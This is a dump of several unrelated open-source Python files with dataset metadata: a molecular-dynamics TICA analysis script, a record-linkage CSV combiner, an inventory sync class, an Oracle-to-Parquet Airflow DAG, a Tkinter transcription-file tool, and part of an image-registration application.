unittest2.main()\n","repo_name":"eightcien/lldb","sub_path":"test/help/TestHelp.py","file_name":"TestHelp.py","file_ext":"py","file_size_in_byte":3515,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"22"} +{"seq_id":"37311699291","text":"import logging\nfrom tqdm.auto import tqdm\nfrom typing import Tuple, List, Any\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport pyemma\nfrom deeptime.clustering import KMeans\nfrom deeptime.decomposition import TICA\nfrom deeptime.markov import TransitionCountEstimator, MaximumLikelihoodMSM\nfrom deeptime.plots import plot_implied_timescales\nfrom deeptime.util.validation import implied_timescales\nfrom pyemma.util.contexts import settings\nfrom sklearn.decomposition import PCA\nimport argparse\nimport yaml\n\ndef load_data(pdb_file: str, xtc_files: List[str], selection: str) -> Any:\n \"\"\"\n Load trajectory data for a given protein structure and feature selection.\n\n Parameters\n ----------\n pdb_file : str\n Path to the pdb file.\n xtc_files : List[str]\n List of paths to the xtc files.\n selection : str\n Selection string for the protein residues/features to be considered.\n\n Returns\n -------\n Any\n Loaded trajectory data.\n \"\"\"\n feat = pyemma.coordinates.featurizer(pdb_file)\n selection = feat.select(selection)\n feat.add_distances(selection, periodic=False)\n data = pyemma.coordinates.load(xtc_files, features=feat)\n return data\n\ndef perform_pca(data: Any, n_components: int = 2) -> Tuple[PCA, List[np.ndarray]]:\n \"\"\"\n Perform Principal Component Analysis (PCA) on the trajectory data.\n\n Parameters\n ----------\n data : Any\n Trajectory data.\n n_components : int, optional\n Number of principal components to be computed, by default 2.\n\n Returns\n -------\n Tuple[PCA, List[np.ndarray]]\n Fitted PCA model and transformed trajectory data.\n \"\"\"\n pca = PCA(n_components=n_components)\n pca_output = [pca.fit_transform(traj) for traj in data]\n return pca, pca_output\n\ndef perform_tica(data: Any, lag: int, n_components: int = 2) -> Tuple[TICA, List[np.ndarray]]:\n \"\"\"\n Perform Time-lagged Independent Component Analysis (TICA) on the trajectory data.\n\n Parameters\n ----------\n data : Any\n Trajectory data.\n lag : int\n Time lag to be used for the TICA computation.\n n_components : int, optional\n Number of independent components to be computed, by default 2.\n\n Returns\n -------\n Tuple[TICA, List[np.ndarray]]\n Fitted TICA model and transformed trajectory data.\n \"\"\"\n tica_estimator = TICA(lagtime=lag, dim=n_components)\n tica = tica_estimator.fit_fetch(data)\n tica_output = [tica.transform(traj) for traj in data]\n return tica, tica_output\n\ndef cluster_data(data: List[np.ndarray], n_clusters: int, max_iter: int = 100, n_jobs: int = 2) -> Tuple[KMeans, List[int]]:\n \"\"\"\n Cluster the trajectory data using K-means algorithm.\n\n Parameters\n ----------\n data : List[np.ndarray]\n Trajectory data.\n n_clusters : int\n Number of clusters to be formed.\n max_iter : int, optional\n Maximum number of iterations for the K-means algorithm, by default 100.\n n_jobs : int, optional\n Number of jobs to be used for the computation, by default 2.\n\n Returns\n -------\n Tuple[KMeans, List[int]]\n Fitted KMeans model and list of cluster indices for each data point.\n \"\"\"\n cls = KMeans(n_clusters, max_iter=max_iter, n_jobs=n_jobs).fit(np.concatenate(data)[::10]).fetch_model()\n dtrajs = [cls.transform(traj) for traj in data]\n return cls, dtrajs\n\ndef compute_implied_timescales(dtrajs: List[int], lags: List[int]) -> np.ndarray:\n \"\"\"\n Compute the implied timescales for a given list of lag times.\n\n Parameters\n ----------\n dtrajs : List[int]\n List of cluster indices for each data point.\n lags : List[int]\n List of lag times to be used for the computation.\n\n Returns\n -------\n np.ndarray\n Computed implied timescales.\n \"\"\"\n return implied_timescales([MaximumLikelihoodMSM(lagtime=lag).fit_fetch(dtrajs) for lag in lags])\n\ndef save_to_pickle(data: Any, filename: str) -> None:\n \"\"\"\n Save data to a pickle file.\n\n Parameters\n ----------\n data : Any\n Data to be saved.\n filename : str\n Path to the pickle file.\n \"\"\"\n with open(filename, 'wb') as f:\n pickle.dump(data, f)\n\ndef load_from_pickle(filename: str) -> Any:\n \"\"\"\n Load data from a pickle file.\n\n Parameters\n ----------\n filename : str\n Path to the pickle file.\n\n Returns\n -------\n Any\n Loaded data.\n \"\"\"\n with open(filename, 'rb') as f:\n return pickle.load(f)\n\ndef save_tics_to_txt(tica_output: List[np.ndarray], sysName: str) -> None:\n \"\"\"\n Save the first two TICA components to text files.\n\n Parameters\n ----------\n tica_output : List[np.ndarray]\n Transformed trajectory data after TICA.\n sysName : str\n System name to be used for the output file names.\n \"\"\"\n # check if the tics folder exists \n # ODO\n np.savetxt(f'./tics/{sysName}_tica_tic1.txt',np.concatenate(tica_output)[:, 0], delimiter='\\n', fmt='%.10f')\n np.savetxt(f'./tics/{sysName}_tica_tic2.txt',np.concatenate(tica_output)[:, 1], delimiter='\\n', fmt='%.10f')\n\ndef parse_args() -> argparse.Namespace:\n \"\"\"\n Parse command-line arguments.\n\n Returns\n -------\n argparse.Namespace\n Parsed command-line arguments.\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"config\", help=\"Path to the configuration file\")\n return parser.parse_args()\n\ndef load_config(config_path: str) -> dict:\n \"\"\"\n Load configuration from a yaml file.\n\n Parameters\n ----------\n config_path : str\n Path to the yaml configuration file.\n\n Returns\n -------\n dict\n Loaded configuration.\n \"\"\"\n with open(config_path, 'r') as f:\n return yaml.safe_load(f)\n\nif __name__ == \"__main__\":\n args = parse_args()\n config = load_config(args.config)\n\n pdb_file = config['pdb_file']\n xtc_files = config['xtc_files']\n sysName = config['sysName']\n lag = config['lag']\n n_components = config['n_components']\n n_clusters = config['n_clusters']\n lags = config['lags']\n selection = config['selection']\n\n logging.info(\"Loading data...\")\n data = load_data(pdb_file, xtc_files, selection)\n save_to_pickle(data, f'{sysName}.pickle')\n\n logging.info(\"Performing PCA...\")\n pca, pca_output = perform_pca(data, n_components)\n logging.info(\"Performing TICA...\")\n tica, tica_output = perform_tica(data, lag, n_components)\n\n logging.info(\"Clustering data...\")\n cls_pca, dtrajs_pca = cluster_data(pca_output, n_clusters)\n cls_tica, dtrajs_tica = cluster_data(tica_output, n_clusters)\n\n logging.info(\"Computing implied timescales...\")\n its_pca = compute_implied_timescales(dtrajs_pca, lags)\n its_tica = compute_implied_timescales(dtrajs_tica, lags)\n\n save_to_pickle(tica_output, f'{sysName}_tica_output.pickle')\n save_to_pickle(pca_output, f'{sysName}_pca_output.pickle')\n\n save_tics_to_txt(tica_output, sysName)\n","repo_name":"engelberger/md-analysis-utils","sub_path":"tica/run_tica.py","file_name":"run_tica.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5931907790","text":"import pandas as pd\n\nfrom pes_match.parameters import CHECKPOINT_PATH, OUTPUT_PATH, OUTPUT_VARIABLES\n\n# Stage 2 File names\nmatchkey_unique = \"Stage_2_Matchkey_Unique_Matches\"\nmatchkey_nonunique = \"Stage_2_Matchkey_Conflict_Matches\"\nassociative = \"Stage_2_Associative_Unique_Matches\"\n\n# Read in and combine\ndf1 = pd.read_csv(\n CHECKPOINT_PATH + matchkey_unique + \".csv\", iterator=False, index_col=False\n)[OUTPUT_VARIABLES]\ndf2 = pd.read_csv(\n CHECKPOINT_PATH + matchkey_nonunique + \".csv\", iterator=False, index_col=False\n)[OUTPUT_VARIABLES]\ndf3 = pd.read_csv(\n CHECKPOINT_PATH + associative + \".csv\", iterator=False, index_col=False\n)[OUTPUT_VARIABLES]\nStage_2_matches = pd.concat([df1, df2, df3]).reset_index(drop=True)\n\n# Combine with Stage 1 matches\nStage_1_matches = pd.read_csv(\n OUTPUT_PATH + \"Stage_1_All_Matches.csv\", iterator=False, index_col=False\n)[OUTPUT_VARIABLES]\nall_matches = pd.concat([Stage_1_matches, Stage_2_matches])\n\n# Save to output folder\nall_matches.to_csv(OUTPUT_PATH + \"Stage_2_All_Matches.csv\", header=True, index=False)\n","repo_name":"Data-Linkage/pes_match","sub_path":"pipeline/2_Stage_2/03_stage_2_combine.py","file_name":"03_stage_2_combine.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"22"} +{"seq_id":"5166737288","text":"import copy\nimport logging\nfrom django.db import transaction\nfrom zentral.contrib.inventory.models import MachineSnapshot\n\n__all__ = ['BaseInventory', 'InventoryError']\n\nlogger = logging.getLogger('zentral.contrib.inventory.clients.base')\n\n\nclass InventoryError(Exception):\n pass\n\n\nclass BaseInventory(object):\n source_config_secret_attributes = None\n\n def __init__(self, config_d):\n if not hasattr(self, 'name'):\n self.name = self.__module__.split('.')[-1]\n config_d = copy.deepcopy(config_d)\n config_d.pop('backend')\n if self.source_config_secret_attributes:\n for attr in self.source_config_secret_attributes:\n config_d.pop(attr, None)\n self.source = {'module': self.__module__,\n 'name': self.name,\n 'config': config_d}\n\n def get_machines(self):\n raise NotImplementedError\n\n # inventory API\n def _events_from_diff(self, diff):\n events = []\n for m2m_attr, event_type in (('links', 'inventory_link_update'),\n ('osx_app_instances', 'inventory_osx_app_instance_update'),\n ('groups', 'inventory_group_update')):\n m2m_diff = diff.get(m2m_attr, {})\n for action in ['added', 'removed']:\n for obj in m2m_diff.get(action, []):\n obj['action'] = action\n if 'source' not in obj:\n obj['source'] = self.source\n events.append((event_type, obj))\n for fk_attr in ('reference',\n 'machine',\n 'business_unit',\n 'os_version',\n 'system_info',\n 'teamviewer'):\n event_type = 'inventory_{}_update'.format(fk_attr)\n fk_diff = diff.get(fk_attr, {})\n for action in ['added', 'removed']:\n obj = fk_diff.get(action, None)\n if obj:\n if isinstance(obj, dict):\n event = obj\n if 'source' not in obj:\n event['source'] = self.source\n else:\n event = {'source': self.source,\n fk_attr: obj}\n event['action'] = action\n events.append((event_type, event))\n return events\n\n def sync(self):\n for machine_d in self.get_machines():\n source = copy.deepcopy(self.source)\n try:\n serial_number = machine_d['machine']['serial_number']\n except KeyError:\n logger.warning('Machine w/o serial number. Client \"%s\". Reference \"%s\"',\n self.name, machine_d.get('reference', 'Unknown'))\n continue\n if not serial_number:\n logger.warning('Machine serial number blank. Client \"%s\". Reference \"%s\"',\n self.name, machine_d.get('reference', 'Unknown'))\n continue\n # source will be modified by mto\n machine_d['source'] = source\n for group_d in machine_d.get('groups', []):\n group_d['source'] = source\n business_unit_d = machine_d.get('business_unit', None)\n if business_unit_d:\n business_unit_d['source'] = source\n with transaction.atomic():\n machine_snapshot, created = MachineSnapshot.objects.commit(machine_d)\n if created:\n diff = machine_snapshot.update_diff()\n if diff is None:\n events = [('inventory_machine_added',\n {'source': self.source,\n 'machine_snapshot': machine_snapshot.serialize()})]\n else:\n events = self._events_from_diff(diff)\n yield machine_snapshot, events\n\n def add_machine_to_group(self, machine_snapshot, group_name):\n raise NotImplementedError\n","repo_name":"Mbatey88/zentral","sub_path":"zentral/contrib/inventory/clients/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"22"} +{"seq_id":"23725203225","text":"import os\nimport re\nimport logging\nfrom datetime import datetime, timedelta\n\nfrom airflow import DAG\nfrom airflow.decorators import task\nfrom airflow.operators.empty import EmptyOperator\nfrom airflow.providers.oracle.hooks.oracle import OracleHook\nfrom airflow.providers.postgres.hooks.postgres import PostgresHook\n\nimport pandas as pd\nimport pyarrow as pa\nimport pyarrow.parquet as pq\n#import snowflake.connector\n\nfrom helpers import export_partition_to_parquet, export_non_partitioned_table_to_parquet, get_high_value\n\n# Global variables\ntables_non_partitioned = ['CLIENT', 'ACCOUNT', 'CARD', 'COUNTRY', 'CURRENCY']\ntables_partitioned_by_day = ['TRANSACTION']\ntables_partitioned_by_month = []\n\npostgres_conn_id = 'postgres_metadata'\noracle_conn_id = \"oracle_neobank\"\nschema_name = 'NEOBANK'\n\n@task\ndef flush_database_monitoring_info():\n hook = OracleHook(oracle_conn_id=oracle_conn_id)\n conn = hook.get_conn()\n\n # Iterate through the list of tables to gather statistics\n flush_database_monitoring_info_query = \"\"\"\n BEGIN\n DBMS_STATS.FLUSH_DATABASE_MONITORING_INFO;\n END;\n \"\"\"\n\n with conn.cursor() as cursor:\n cursor.execute(flush_database_monitoring_info_query)\n\n@task\ndef get_tab_modifications():\n # Connect to Oracle and fetch data from USER_TAB_MODIFICATIONS\n oracle_hook = OracleHook(oracle_conn_id)\n oracle_conn = oracle_hook.get_conn()\n\n oracle_query = \"\"\"\n SELECT TABLE_NAME, PARTITION_NAME, SUBPARTITION_NAME, INSERTS, UPDATES, DELETES, TIMESTAMP AS TIMESTAMP_VAL, TRUNCATED, DROP_SEGMENTS\n FROM USER_TAB_MODIFICATIONS\n \"\"\"\n\n oracle_data = []\n with oracle_conn.cursor() as oracle_cursor:\n oracle_cursor.execute(oracle_query)\n for row in oracle_cursor.fetchall():\n row = list(row)\n row[6] = row[6].strftime(\"%Y-%m-%d %H:%M:%S\") # Convert datetime to string\n oracle_data.append(tuple(row))\n\n return oracle_data\n\n@task\ndef save_tab_modifications_snapshot(tab_modifications):\n # Connect to PostgreSQL and insert data into the snapshot_tab_modifications table\n postgres_hook = PostgresHook(postgres_conn_id)\n postgres_conn = postgres_hook.get_conn()\n\n postgres_insert_query = \"\"\"\n INSERT INTO snapshot_tab_modifications (\n snapshot_dt, table_owner, table_name, partition_name, subpartition_name, inserts, updates, deletes, \"timestamp\", truncated, drop_segments)\n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n \"\"\"\n\n snapshot_dt = datetime.now()\n with postgres_conn.cursor() as postgres_cursor:\n for row in tab_modifications:\n postgres_cursor.execute(postgres_insert_query, (snapshot_dt, schema_name,) + tuple(row))\n postgres_conn.commit()\n\n@task\ndef export_changed_data(tab_modifications):\n if tab_modifications is None:\n logging.error(\"No changed tables or partitions results found.\")\n return\n\n changed_tables = set()\n changed_partitions = set()\n\n for row in tab_modifications:\n table_name, partition_name, subpartition_name, inserts, updates, deletes, timestamp_val, truncated, drop_segments = tuple(row)\n\n if any([inserts, updates, deletes, truncated=='YES', drop_segments]):\n if partition_name is None:\n changed_tables.add(table_name)\n else:\n changed_partitions.add((table_name, partition_name))\n\n # Export changed tables from tables_non_partitioned\n for table_name in changed_tables:\n if table_name in tables_non_partitioned:\n export_non_partitioned_table_to_parquet(oracle_conn_id, table_name)\n\n # Export changed partitions\n for table_name, partition_name in changed_partitions:\n # Skip aggregated row\n if partition_name is not None:\n high_value = get_high_value(oracle_conn_id, table_name, partition_name)\n high_value_date = datetime.strptime(high_value, '%Y-%m-%d')\n partition_label = None\n\n if table_name in tables_partitioned_by_day:\n partition_label = high_value_date.strftime('%Y_%m_%d')\n elif table_name in tables_partitioned_by_month:\n partition_label = high_value_date.strftime('%Y_%m')\n\n if partition_label:\n export_partition_to_parquet(oracle_conn_id, table_name, partition_name, partition_label)\n\n# Define the DAG\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime(2023, 3, 1),\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\n\ndag = DAG(\n \"oracle_to_snowflake\",\n default_args=default_args,\n description=\"Export changed partitions from Oracle to Parquet files\",\n schedule_interval='0 0 * * *', # run at midnight every day\n catchup=False,\n)\n\n# Define the task dependencies\nwith dag:\n flush_database_monitoring_info_task = flush_database_monitoring_info()\n tab_modifications = get_tab_modifications()\n save_tab_modifications_snapshot_task = save_tab_modifications_snapshot(tab_modifications)\n export_changed_data_task = export_changed_data(tab_modifications)\n\n final = EmptyOperator(task_id=f\"final\")\n\n flush_database_monitoring_info_task >> tab_modifications\n tab_modifications >> save_tab_modifications_snapshot_task\n tab_modifications >> export_changed_data_task >> final\n\n","repo_name":"Aleksey-Movchanyuk/partition-based-cdc","sub_path":"airflow/dags/oracle_to_snowflake_dag.py","file_name":"oracle_to_snowflake_dag.py","file_ext":"py","file_size_in_byte":5383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"23875560861","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nimport subprocess\r\nimport glob\r\nimport json\r\nfrom tkinter import filedialog # Import filedialog\r\nfrom os import path\r\n\r\n# Create a tkinter window\r\nroot = tk.Tk()\r\nroot.title(\"Auto-trans\")\r\n\r\n# Import the tcl file for the Forest theme\r\nroot.tk.call(\"source\", \"./Forest-ttk-theme-1.0/forest-dark.tcl\")\r\n\r\n# Set the theme with the theme_use method\r\nstyle = ttk.Style(root)\r\nstyle.theme_use(\"forest-dark\")\r\n\r\n# Create a BooleanVar with global scope\r\ntrans_check_var = tk.BooleanVar()\r\n\r\n# Function to run the Auto-trans script\r\ndef run_auto_trans():\r\n # Your Auto-trans script code here\r\n jsonfile = open(\"hiragana.json\", encoding='UTF-8', errors='ignore')\r\n pDict = json.load(jsonfile)\r\n jsonfile.close()\r\n \r\n wav_path = wav_entry.get()\r\n wav_path = wav_path + \"\\\\\"\r\n wav_files = glob.glob(f'{wav_path}*.wav')\r\n \r\n creating_ask = trans_check_var.get()\r\n auto_creating = False\r\n if creating_ask:\r\n auto_creating = True\r\n\r\n for filepath in wav_files:\r\n name = path.basename(filepath)\r\n name = path.splitext(name)[0]\r\n\r\n filepath = filepath.replace(\".wav\", \".trans\")\r\n trans_file = open(filepath, \"w+\")\r\n if auto_creating:\r\n nameLen = len(name)\r\n phoneme = \"Sil \"\r\n findCheck = False\r\n for i in range(0, nameLen):\r\n findCheck = False\r\n if i + 1 < nameLen:\r\n for obj in pDict:\r\n if obj['kana'] == (name[i] + name[i + 1]):\r\n phoneme += obj['phoneme'] + \" \"\r\n findCheck = True\r\n break\r\n if not findCheck:\r\n for obj in pDict:\r\n if obj['kana'] == (name[i]):\r\n phoneme += obj['phoneme'] + \" \"\r\n break\r\n else:\r\n for obj in pDict:\r\n if obj['kana'] == (name[i]):\r\n phoneme += obj['phoneme'] + \" \"\r\n break\r\n\r\n phoneme += \"Sil\"\r\n\r\n trans_file.write(phoneme)\r\n phonlist = phoneme.split()\r\n phonLen = len(phonlist)\r\n for i in range(0, phonLen):\r\n if i < phonLen - 1:\r\n trans_file.write(\"\\n[\" + phonlist[i] + \" \" + phonlist[i + 1] + \"]\")\r\n else:\r\n break\r\n\r\n trans_file.close()\r\n \r\n result_text.config(state=tk.NORMAL)\r\n result_text.delete(\"1.0\", tk.END)\r\n result_text.insert(tk.END, \"Process Completed!\")\r\n result_text.config(state=tk.DISABLED)\r\n\r\ndef browse_wav_directory():\r\n wav_directory = filedialog.askdirectory() # Open directory dialog\r\n wav_entry.delete(0, tk.END) # Clear any previous input\r\n wav_entry.insert(0, wav_directory) # Insert selected directory path\r\n\r\n# Create a frame for the Auto-trans page\r\nauto_trans_page = tk.Frame(root)\r\nauto_trans_page.pack(padx=20, pady=20)\r\n\r\n# Create a label and entry for the wav directory\r\nwav_label = tk.Label(auto_trans_page, text=\"Enter wav directory:\")\r\nwav_label.pack()\r\nwav_entry = tk.Entry(auto_trans_page)\r\nwav_entry.pack()\r\nbrowse_button = ttk.Button(auto_trans_page, text=\"Browse\", command=browse_wav_directory)\r\nbrowse_button.pack()\r\n\r\n# Create a checkbox for transcription writing\r\ntrans_check = ttk.Checkbutton(auto_trans_page, text=\"Write transcriptions automatically\", variable=trans_check_var)\r\ntrans_check.pack()\r\n\r\n# Create a \"Run\" button\r\nrun_button = ttk.Button(auto_trans_page, text=\"Run Auto-trans Script\", command=run_auto_trans)\r\nrun_button.pack()\r\n\r\n# Create a text widget for the script output\r\nresult_text = tk.Text(auto_trans_page, height=5, width=40, state=tk.DISABLED)\r\nresult_text.pack()\r\n\r\n# Start the tkinter main loop\r\nroot.mainloop()\r\n","repo_name":"bread-in-a-can/Canned-Bread-s-VOCALOIDDBTOOL-Swiss-Army-Knife","sub_path":"Auto_trans_GUI.py","file_name":"Auto_trans_GUI.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"22"} +{"seq_id":"7512672751","text":"from contextlib import contextmanager\nfrom os import PathLike\nfrom typing import Optional, Type, Union\n\nimport numpy as np\nimport pandas as pd\nfrom qtpy.QtWidgets import QApplication\nfrom skimage.transform import (\n AffineTransform,\n EuclideanTransform,\n ProjectiveTransform,\n SimilarityTransform,\n)\n\nfrom ._napping_navigator import NappingNavigator\nfrom .qt import NappingDialog, NappingViewer, NappingWidget\n\n\nclass NappingApplication:\n RESTART_RETURN_CODE = 1000\n\n def __init__(self) -> None:\n self._navigator = NappingNavigator()\n self._current_app: Optional[QApplication] = None\n self._current_widget: Optional[NappingWidget] = None\n self._current_source_viewer: Optional[NappingViewer] = None\n self._current_target_viewer: Optional[NappingViewer] = None\n self._transform_type: Optional[Type[ProjectiveTransform]] = None\n self._pre_transform: Optional[np.ndarray] = None\n self._post_transform: Optional[np.ndarray] = None\n self._current_transform: Optional[np.ndarray] = None\n self._current_source_coords: Optional[pd.DataFrame] = None\n self._current_transf_coords: Optional[pd.DataFrame] = None\n self._write_blocked = False\n\n def exec(self, app: Optional[QApplication] = None) -> None:\n return_code = NappingApplication.RESTART_RETURN_CODE\n while return_code == NappingApplication.RESTART_RETURN_CODE:\n self._current_app = app or QApplication([])\n assert self._navigator.current_source_img_file is not None\n self._current_source_viewer = self._create_source_viewer(\n self._navigator.current_source_img_file\n )\n assert self._navigator.current_target_img_file is not None\n self._current_target_viewer = self._create_target_viewer(\n self._navigator.current_target_img_file\n )\n self._current_widget = self._create_widget()\n assert self._navigator.current_control_points_file is not None\n if self._navigator.current_control_points_file.is_file():\n current_control_points = pd.read_csv(\n self._navigator.current_control_points_file,\n index_col=0,\n )\n if len(current_control_points.index) > 0:\n self.set_current_control_points(current_control_points)\n if (\n self._navigator.current_source_coords_file is not None\n and self._navigator.current_source_coords_file.is_file()\n ):\n current_source_coords = pd.read_csv(\n self._navigator.current_source_coords_file\n )\n if len(current_source_coords.index) > 0:\n self._current_source_coords = current_source_coords\n self._update_current_transform()\n self._update_current_transf_coords()\n self._current_source_viewer.control_points_changed_handlers.append(\n self._handle_control_points_changed\n )\n self._current_target_viewer.control_points_changed_handlers.append(\n self._handle_control_points_changed\n )\n self._current_source_viewer.show()\n self._current_target_viewer.show()\n self._current_widget.show()\n self._current_widget.refresh()\n return_code = self._current_app.exec()\n\n def exec_dialog(self, app: Optional[QApplication] = None) -> None:\n if app is None:\n app = QApplication([])\n dialog = self._create_dialog()\n if dialog.exec() == NappingDialog.DialogCode.Accepted:\n assert dialog.transform_type is not None\n self._transform_type = {\n NappingDialog.TransformType.EUCLIDEAN: EuclideanTransform,\n NappingDialog.TransformType.SIMILARITY: SimilarityTransform,\n NappingDialog.TransformType.AFFINE: AffineTransform,\n }[dialog.transform_type]\n if dialog.pre_transform_path is not None:\n self._pre_transform = np.load(dialog.pre_transform_path)\n else:\n self._pre_transform = None\n if dialog.post_transform_path is not None:\n self._post_transform = np.load(dialog.post_transform_path)\n else:\n self._post_transform = None\n if dialog.selection_mode == NappingDialog.SelectionMode.FILE:\n assert dialog.source_img_path is not None\n assert dialog.target_img_path is not None\n assert dialog.control_points_path is not None\n assert dialog.joint_transform_path is not None\n self._navigator.load_file(\n dialog.source_img_path,\n dialog.target_img_path,\n dialog.control_points_path,\n dialog.joint_transform_path,\n source_coords_file=dialog.source_coords_path,\n transf_coords_file=dialog.transf_coords_path,\n )\n elif dialog.selection_mode == NappingDialog.SelectionMode.DIR:\n assert dialog.matching_strategy is not None\n assert dialog.source_img_path is not None\n assert dialog.target_img_path is not None\n assert dialog.control_points_path is not None\n assert dialog.joint_transform_path is not None\n dialog.control_points_path.mkdir(exist_ok=True)\n dialog.joint_transform_path.mkdir(exist_ok=True)\n if dialog.transf_coords_path is not None:\n dialog.transf_coords_path.mkdir(exist_ok=True)\n self._navigator.load_dir(\n dialog.source_img_path,\n dialog.target_img_path,\n dialog.control_points_path,\n dialog.joint_transform_path,\n {\n NappingDialog.MatchingStrategy.ALPHABETICAL: (\n NappingNavigator.MatchingStrategy.ALPHABETICAL\n ),\n NappingDialog.MatchingStrategy.FILENAME: (\n NappingNavigator.MatchingStrategy.FILENAME\n ),\n NappingDialog.MatchingStrategy.REGEX: (\n NappingNavigator.MatchingStrategy.REGEX\n ),\n }[dialog.matching_strategy],\n source_regex=dialog.source_regex,\n target_regex=dialog.target_regex,\n source_coords_regex=dialog.source_coords_regex,\n source_coords_dir=dialog.source_coords_path,\n transf_coords_dir=dialog.transf_coords_path,\n )\n else:\n raise RuntimeError(\"Unexpected dialog selection mode\")\n self.exec(app=app)\n\n def restart(self) -> None:\n assert self._current_app is not None\n assert self._current_widget is not None\n assert self._current_source_viewer is not None\n assert self._current_target_viewer is not None\n self._current_source_viewer.close()\n self._current_target_viewer.close()\n self._current_widget.close()\n self._current_app.exit(returnCode=NappingApplication.RESTART_RETURN_CODE)\n self._current_app = None\n self._current_widget = None\n self._current_source_viewer = None\n self._current_target_viewer = None\n\n def get_current_joint_transform(self) -> Optional[np.ndarray]:\n if self._current_transform is not None:\n current_joint_transform = self._current_transform\n if self._pre_transform is not None:\n current_joint_transform = current_joint_transform @ self._pre_transform\n if self._post_transform is not None:\n current_joint_transform = self._post_transform @ current_joint_transform\n return current_joint_transform\n return None\n\n def get_current_control_points(self) -> Optional[pd.DataFrame]:\n if (\n self._current_source_viewer is not None\n and self._current_target_viewer is not None\n ):\n current_source_control_points = (\n self._current_source_viewer.get_control_points()\n )\n current_target_control_points = (\n self._current_target_viewer.get_control_points()\n )\n if (\n current_source_control_points is not None\n and current_target_control_points is not None\n ):\n return pd.merge(\n current_source_control_points,\n current_target_control_points,\n left_index=True,\n right_index=True,\n suffixes=(\"_source\", \"_target\"),\n )\n return None\n\n def set_current_control_points(\n self, current_control_points: Optional[pd.DataFrame]\n ) -> None:\n assert self._current_source_viewer is not None\n assert self._current_target_viewer is not None\n with self._block_write():\n if current_control_points is not None:\n current_source_control_points = current_control_points.loc[\n :, [\"x_source\", \"y_source\"]\n ].copy()\n current_target_control_points = current_control_points.loc[\n :, [\"x_target\", \"y_target\"]\n ].copy()\n current_source_control_points.columns = [\"x\", \"y\"]\n current_target_control_points.columns = [\"x\", \"y\"]\n self._current_source_viewer.set_control_points(\n current_source_control_points\n )\n self._current_target_viewer.set_control_points(\n current_target_control_points\n )\n else:\n self._current_source_viewer.set_control_points(None)\n self._current_target_viewer.set_control_points(None)\n\n def get_current_control_point_residuals(\n self,\n ) -> Optional[np.ndarray]:\n if self._current_transform is not None:\n current_control_points = self.get_current_control_points()\n if current_control_points is not None and not current_control_points.empty:\n assert self._transform_type is not None\n tf = self._transform_type(self._current_transform)\n return tf.residuals(\n current_control_points.loc[:, [\"x_source\", \"y_source\"]].to_numpy(),\n current_control_points.loc[:, [\"x_target\", \"y_target\"]].to_numpy(),\n )\n return None\n\n def _create_dialog(self) -> NappingDialog:\n return NappingDialog()\n\n def _create_source_viewer(self, img_file: Union[str, PathLike]) -> NappingViewer:\n return NappingViewer(img_file)\n\n def _create_target_viewer(self, img_file: Union[str, PathLike]) -> NappingViewer:\n return NappingViewer(img_file)\n\n def _create_widget(self) -> NappingWidget:\n return NappingWidget(self)\n\n def _handle_control_points_changed(\n self, viewer: NappingViewer, control_points: Optional[pd.DataFrame]\n ) -> None:\n current_control_points = self.get_current_control_points()\n if not self._write_blocked and current_control_points is not None:\n assert self._navigator.current_control_points_file is not None\n with self._navigator.current_control_points_file.open(\n mode=\"wb\", buffering=0\n ) as f:\n current_control_points.to_csv(f, mode=\"wb\")\n self._update_current_transform()\n current_joint_transform = self.get_current_joint_transform()\n if not self._write_blocked and current_joint_transform is not None:\n np.save(\n self._navigator.current_joint_transform_file,\n current_joint_transform,\n )\n self._update_current_transf_coords()\n if not self._write_blocked and self._current_transf_coords is not None:\n assert self._navigator.current_transf_coords_file is not None\n with self._navigator.current_transf_coords_file.open(\n mode=\"wb\", buffering=0\n ) as f:\n self._current_transf_coords.to_csv(f, mode=\"wb\", index=False)\n assert self._current_widget is not None\n self._current_widget.refresh()\n\n def _update_current_transform(self) -> None:\n self._current_transform = None\n current_control_points = self.get_current_control_points()\n assert current_control_points is not None\n if current_control_points.shape[0] >= 3:\n assert self._transform_type is not None\n tf = self._transform_type()\n if tf.estimate(\n current_control_points.loc[:, [\"x_source\", \"y_source\"]].to_numpy(),\n current_control_points.loc[:, [\"x_target\", \"y_target\"]].to_numpy(),\n ):\n self._current_transform = tf.params\n\n def _update_current_transf_coords(self) -> None:\n self._current_transf_coords = None\n current_joint_transform = self.get_current_joint_transform()\n if (\n self._current_source_coords is not None\n and current_joint_transform is not None\n ):\n x = np.ones((self._current_source_coords.shape[0], 3))\n x[:, :2] = self._current_source_coords.loc[:, [\"X\", \"Y\"]].to_numpy()\n self._current_transf_coords = self._current_source_coords.copy()\n self._current_transf_coords.loc[:, [\"X\", \"Y\"]] = (\n current_joint_transform @ x.T\n ).T[:, :2]\n\n @contextmanager\n def _block_write(self):\n self._write_blocked = True\n yield\n self._write_blocked = False\n\n @property\n def navigator(self) -> NappingNavigator:\n return self._navigator\n\n @property\n def current_app(self) -> Optional[QApplication]:\n return self._current_app\n\n @property\n def current_widget(self) -> Optional[NappingWidget]:\n return self._current_widget\n\n @property\n def current_source_viewer(self) -> Optional[NappingViewer]:\n return self._current_source_viewer\n\n @property\n def current_target_viewer(self) -> Optional[NappingViewer]:\n return self._current_target_viewer\n\n @property\n def transform_type(self) -> Optional[Type[ProjectiveTransform]]:\n return self._transform_type\n\n @transform_type.setter\n def transform_type(\n self, transform_type: Optional[Type[ProjectiveTransform]]\n ) -> None:\n self._transform_type = transform_type\n\n @property\n def pre_transform(self) -> Optional[np.ndarray]:\n 